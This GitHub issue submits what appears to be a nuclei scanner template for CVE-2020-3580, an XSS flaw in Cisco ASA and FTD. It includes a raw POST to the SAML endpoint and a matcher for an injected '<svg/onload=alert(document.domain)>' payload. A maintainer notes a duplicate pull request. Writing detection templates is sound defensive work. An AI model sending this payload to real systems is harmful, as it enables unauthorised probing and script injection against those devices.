We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
CVE-2020-3580 - https://nvd.nist.gov/vuln/detail/CVE-2020-3580
id: CVE-2020-3580 info: name: CVE-2020-3580 author: Mikey96 severity: Medium description: CVE-2020-3580 - Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software XSS requests: - raw: - | POST / CSCOE /saml/sp/acs?tgname=a HTTP/1.1 Host: {{Hostname}} Cookie: webvpnlogin=1; webvpnLang=en User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0 Accept: text/html,application/xhtml xml,application/xml;q=0.9,image/webp,/;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 66 Upgrade-Insecure-Requests: 1 Te: trailers Connection: close SAMLResponse="> matchers-condition: and matchers: - type: word words: - '<svg/onload=alert(document.domain)>' part: body
The text was updated successfully, but these errors were encountered:
Thank you @mikey96 for sharing this, unfortunately we already have PR under review for this CVE #1773
Sorry, something went wrong.
No branches or pull requests
CVE-2020-3580 - https://nvd.nist.gov/vuln/detail/CVE-2020-3580
The text was updated successfully, but these errors were encountered: